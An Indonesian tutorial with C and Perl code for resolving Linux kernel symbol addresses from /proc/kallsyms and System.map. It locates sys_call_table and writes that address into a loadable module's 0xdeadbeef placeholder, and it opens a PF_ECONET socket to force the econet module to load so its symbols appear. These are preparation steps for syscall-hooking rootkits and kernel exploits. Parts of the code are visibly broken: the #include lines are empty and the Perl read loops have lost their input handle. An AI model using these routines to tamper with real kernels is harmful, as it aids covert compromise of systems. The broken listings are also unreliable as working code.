simbol kernel

[Kernel Simbol]

Berikut fungsi yang digunakan untuk mendapatkan alamat memori suatu simbol kernel (dikembalikan sebagai unsigned long):
================================
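/*
 * get_kernel_sym - look up the address of a kernel symbol by name.
 *
 * Scans /proc/kallsyms (falling back to /proc/ksyms, then to
 * /boot/System.map-<release>) for an exact match on @name.  On a hit the
 * address is printed to stdout and returned; 0 means "not found" or "no
 * symbol source could be opened".
 *
 * @name: NUL-terminated symbol name to resolve; read only, never modified.
 *
 * Return: the symbol address, or 0.
 *
 * Review notes:
 *  - The symbol files are read line by line and parsed with width-limited
 *    conversions, so an over-long name in any of them cannot overrun sname[]
 *    (the original used an unbounded "%s" into the 512-byte buffer).
 *  - Lines that do not parse completely are skipped instead of being compared
 *    against a stale sname[] left over from the previous line.
 *  - The address is read with "%lx" straight into the unsigned long; the
 *    original read "%p" through a (void **) cast, aliasing the integer as a
 *    pointer.
 *  - The path for System.map is built with snprintf() and the uname() result
 *    is checked.
 *  - On kernels that honour kptr_restrict, an unprivileged reader sees every
 *    address in /proc/kallsyms as 0; a match then "resolves" to 0, exactly as
 *    the original behaved.
 */
unsigned long get_kernel_sym(char *name)
{
        FILE *f;
        unsigned long addr = 0;
        char dummy;
        char sname[512];
        char line[1024];
        struct utsname ver;
        int rep = 0;
        int oldstyle = 0;

        f = fopen("/proc/kallsyms", "r");
        if (f == NULL) {
                /* Older kernels export the table as /proc/ksyms, "addr name [module]". */
                f = fopen("/proc/ksyms", "r");
                if (f == NULL)
                        goto fallback;
                oldstyle = 1;
        }

repeat:
        while (fgets(line, sizeof line, f) != NULL) {
                int ret;

                /* An over-long line was only partially read: discard its tail so
                 * the next fgets() starts on a fresh line rather than mid-name. */
                if (strchr(line, '\n') == NULL) {
                        int c;
                        while ((c = fgetc(f)) != EOF && c != '\n')
                                ;
                }

                if (!oldstyle) {
                        /* kallsyms / System.map layout: "addr type name [module]". */
                        ret = sscanf(line, "%lx %c %511s", &addr, &dummy, sname);
                        if (ret != 3)
                                continue;
                } else {
                        char *p;

                        ret = sscanf(line, "%lx %511s", &addr, sname);
                        if (ret != 2)
                                continue;
                        /* Skip decorated entries (presumably the versioned/module
                         * aliases of the old ksyms format - TODO confirm). */
                        if (strstr(sname, "_O/") || strstr(sname, "_S."))
                                continue;
                        /* Strip a trailing "..smp_<suffix>" decoration down to the
                         * bare name, as the original did; the p > sname + 5 guard
                         * keeps the p - 3 read inside the buffer. */
                        p = strrchr(sname, '_');
                        if (p > sname + 5 && !strncmp(p - 3, "smp", 3)) {
                                p -= 4;
                                while (p > sname && *(p - 1) == '_')
                                        p--;
                                *p = '\0';
                        }
                }

                if (!strcmp(name, sname)) {
                        fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr,
                                rep ? " (via System.map)" : "");
                        fclose(f);
                        return addr;
                }
        }

        fclose(f);
        if (rep)
                return 0;

fallback:
        /* No /proc view of the symbol table: try the System.map that matches
         * the running kernel release. */
        if (uname(&ver) != 0)
                return 0;
        /* NOTE(review): kept as the original wrote it - every release that does
         * not start with "2.6" (so 3.x and later as well) is parsed in the
         * two-field "old style", although System.map uses three fields. */
        if (strncmp(ver.release, "2.6", 3))
                oldstyle = 1;
        if (snprintf(sname, sizeof sname, "/boot/System.map-%s", ver.release) >= (int)sizeof sname)
                return 0;
        f = fopen(sname, "r");
        if (f == NULL)
                return 0;
        rep = 1;
        goto repeat;
}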
===================

Dengan memanggil fungsi di atas dari program userspace (nama simbol dilewatkan by value sebagai parameter), kita mendapatkan alamat memori kernel dari simbol tersebut; fungsi mengembalikannya sebagai unsigned long dan mencetaknya sebagai "void pointer" (%p).

Karena kernelnya versi 2.6, simbol kernel umumnya bisa diakses di /proc/kallsyms:
==============
root@ev1lut10n-Vostro1310:/home/ev1lut10n/c/kernel# cat /proc/kallsyms | grep econet_ioctl
fcdfd2a0 t econet_ioctl    [econet]
===============

Misalnya kita melewatkan "econet_ioctl" by value:
========
econet_ioctl = get_kernel_sym("econet_ioctl");
========

maka :
=============
ev1lut10n@ev1lut10n-Vostro1310:~/c/kernel$ ./simbol
 [+] Resolved econet_ioctl to 0xfcdfd2a0
=============

Pada versi Perl kita bisa membuat kode dengan perilaku serupa, tetapi alamat memori disimpan di dalam variabel biasa, bukan pointer:
=========
# get_syscall_table_addr - scan the kernel symbol listing for sys_call_table
# and pass the address found to got_and_replace_kmem().
#
# Reads /proc/ksyms when the global $style matches "oldies" (the string is
# used as a regex), otherwise /proc/kallsyms; when that file does not exist
# it reads /boot/System.ma* instead.  Every line is appended to the global
# $tampilan_simbol and split on whitespace into ($mem,$mode,$simbol).
# $style, $simpat, $sysmap, $mem, $mode, $simbol and $tampilan_simbol are all
# package globals; none is declared here.
#
# NOTE(review): the two `while ()` loops below appear to have lost their
# `<KALLSYMS>` / `<SYSMAP>` readline operand when the page was extracted; as
# printed, the empty condition is an endless loop.  `-e "/boot/System.map*"`
# tests a literal file name (no glob expansion) and $sysmap is assigned but
# never used - the open() hard-codes its own pattern, which the shell
# expands, so several System.map files would be concatenated.  The whole
# body runs inside eval {}, so any die() is silently swallowed.
sub get_syscall_table_addr
{
eval
{
print "The Most Simple Method to get sys_call_table addr";
print "\nc0d3 by : ev1lut10n";
if($style=~"oldies")
 {
    $simpat="/proc/ksyms";
 }
 else
 {
         $simpat="/proc/kallsyms";

 }
if(-e $simpat)
 {
     print "\n[+] Checkin $simpat\n";
# Two-argument open with a trailing "|" runs the command through a shell;
# $simpat can only be one of the two fixed paths above.
open(KALLSYMS, "cat $simpat |");
                                     while ()
                                            {
                                                $tampilan_simbol .=  $_;
                        ($mem,$mode,$simbol) = split;   
                            if($simbol=~/sys_call_table/)
                            {
                              got_and_replace_kmem($mem);
                                }
                        }
close(KALLSYMS);
  }
  else
  {
      print "\n[+] Checkin System.Map\n";
      if(-e "/boot/System.map*")
        {
         $sysmap="/boot/System.map*";  
        }
        else
        {
             $sysmap="/System.ma*";  
        }
      open(SYSMAP, "cat /boot/System.ma* |");
                                     while ()
                                            {
                                                $tampilan_simbol .=  $_;
                        ($mem,$mode,$simbol) = split;   
                            if($simbol=~/sys_call_table/)
                            {
                               got_and_replace_kmem($mem);
                                }
                        }
close(SYSMAP);
  }
 
}
}

# got_and_replace_kmem - prefix the address with "0x" and substitute it for
# the 0xdeadbeef placeholder in ev1lut10n.c.
#
# Takes no explicit argument: it reads and rewrites the package global $mem
# (the caller passes it as a parameter, but @_ is never used) and sets the
# global $oldies to the placeholder string.
#
# NOTE(review): $mem comes straight from the symbol listing and is
# interpolated unquoted into a shell command line via system(); it should be
# checked against /^[0-9a-fA-F]+$/ (or the edit done in Perl without a shell)
# before being used this way.  The return value of system() is not checked.
sub got_and_replace_kmem
{
                               $mem="0x".$mem;
                               print "[+] Got sys_call_table addr :".$mem."\n";
                              $oldies="0xdeadbeef";
                              print "\nreplacing ...\n";
                              print "\nReplacing 0xdeadbeef with $mem\n";
                              system("perl -p -i -e 's/$oldies/$mem/' ev1lut10n.c");
   
}
=========


Misalnya ev1lut10n.c merupakan LKM yang mengandung baris:
===
unsigned long *sys_call_table = (unsigned long *) 0xdeadbeef;
=====



Ada beberapa simbol kernel yang belum muncul di tabel simbol /proc/kallsyms sebelum modul yang memuat fungsi terkait dimuat ke memori:

====
root@ev1lut10n-Vostro1310:/home/ev1lut10n/c/kernel# cat /proc/kallsyms | grep econet
=====tidak ada======
====

Untuk itu perlu dibuat socket PF_ECONET:
===
socket(PF_ECONET, SOCK_DGRAM, 0);
====

cat econet.c:
====
#include
#include
#include
#include
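/*
 * Create one PF_ECONET datagram socket and exit.
 *
 * The listing on this page shows econet's symbols in /proc/kallsyms only
 * after this program has run, consistent with the kernel loading the module
 * on demand for the socket() call.  (On hosts where that legacy family is
 * not wanted, module blacklisting is the usual way to stop the autoload.)
 * The descriptor is deliberately left open; it is released at exit.
 *
 * Return: 0 when the socket was created, 1 when socket() failed.
 */
int main(void)
{
        /* Named fd, not socket: a local called 'socket' is already in scope
         * inside its own initializer, so `int socket = socket(...)` does not
         * compile (the identifier no longer names the function). */
        int fd = socket(PF_ECONET, SOCK_DGRAM, 0);

        return fd < 0 ? 1 : 0;
}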
===========

gcc -o econet econet.c
cat /proc/kallsyms | grep econet

===
root@ev1lut10n-Vostro1310:/home/ev1lut10n/c/kernel# cat /proc/kallsyms | grep econet
fcdfd2fc t econet_proto_exit    [econet]
fcdfdce0 b ab_cleanup_timer    [econet]
fcdfdcc0 b udpsock    [econet]
fcdfd5e0 d econet_netdev_notifier    [econet]
fcdfd6e0 d econet_packet_type    [econet]
fcdfd600 d econet_proto    [econet]
fcdfd6b4 d econet_mutex    [econet]
fcdfc0c0 t econet_bind    [econet]
fcdfc130 t econet_getname    [econet]
fcdfc1c0 t econet_sendmsg    [econet]
fcdfd8c0 b net2dev_map    [econet]
fcdfdcc4 b aun_seq    [econet]
fcdfdcc8 b aun_queue    [econet]
fcdfc790 t ec_tx_done    [econet]
fcdfc6f0 t tx_result    [econet]
fcdfc7b0 t econet_destroy_timer    [econet]
fcdfc810 t econet_create    [econet]
fcdfd3a0 r econet_ops    [econet]
fcdfd6c8 d econet_lock    [econet]
fcdfd8a4 b econet_sklist    [econet]
fcdfc8e0 t econet_release    [econet]
fcdfca00 t econet_rcv    [econet]
fcdfcbe0 t econet_notifier    [econet]
fcdfd8a0 b aun_queue_lock    [econet]
fcdfccf0 t ab_cleanup    [econet]
fcdfcfe0 t aun_data_available    [econet]
fcdfcc50 t aun_tx_ack    [econet]
fcdfd380 r econet_family_ops    [econet]
fcdfcd90 t T.924    [econet]
fcdfce40 t aun_incoming    [econet]
fcdfd0c0 t ec_dev_ioctl    [econet]
fcdfd2a0 t econet_ioctl    [econet]
fcdfc000 t econet_recvmsg    [econet]
fcdfd720 d __this_module    [econet]
fcdfd2fc t cleanup_module    [econet]
==============